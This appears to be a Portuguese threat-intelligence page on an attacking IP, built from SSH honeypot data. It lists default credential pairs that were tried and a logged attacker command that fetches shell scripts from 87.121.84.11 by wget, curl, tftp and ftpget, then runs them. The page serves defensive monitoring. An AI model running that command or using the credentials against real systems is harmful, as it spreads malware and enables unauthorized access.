TROYANOSYVIRUS
Ameaca AtivaBAIXO

151.115.80.140

Pais de Origem🇵🇱 Polonia
Primeira Deteccao09/02/2026
Ultima Atividade09/02/2026
ISPScaleway S.a.s.
🎯
68
Ataques Totais
🔌
1
Portas
📡
1
Tipos de Ataque
🦠
1
Malware

Geolocalizacao

Pais
🇵🇱 Polonia
Cidade
Warsaw
ASN
AS12876
ISP
Scaleway S.a.s.

Tipos de Ataque

cowrie

Portas Atacadas

22

Malware Associado

c6c5b918005b5fa8515f...

Credenciais Tentadas

🔐admin/admin
2x
🔐guest/guest
1x
🔐root/oelinux123
1x
🔐root/1
1x
🔐root/1234
1x
🔐root/root
1x
🔐root/123456
1x
🔐root/ute123
1x
🔐dev/dev
1x
🔐user/user
1x
🔐ubnt/ubnt
1x
🔐ubuntu/ubuntu
1x

Comandos Executados

$uname -a ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.84.11/cnd.sh 2>/dev/null; curl -sO http://87.121.84.11/cnd.sh 2>/dev/null; chmod 777 cnd.sh 2>/dev/null; sh cnd.sh 2>/dev/null; tftp 87.121.84.11 -c get cnd1.sh 2>/dev/null; chmod 777 cnd1.sh 2>/dev/null; sh cnd1.sh 2>/dev/null; tftp -r cnd2.sh -g 87.121.84.11 2>/dev/null; chmod 777 cnd2.sh 2>/dev/null; sh cnd2.sh 2>/dev/null; ftpget -v -u anonymous -p anonymous -P 21 87.121.84.11 cnd3.sh cnd3.sh 2>/dev/null; sh2x

Avaliacao de Risco

35
/100
BaixoMedioAltoCritico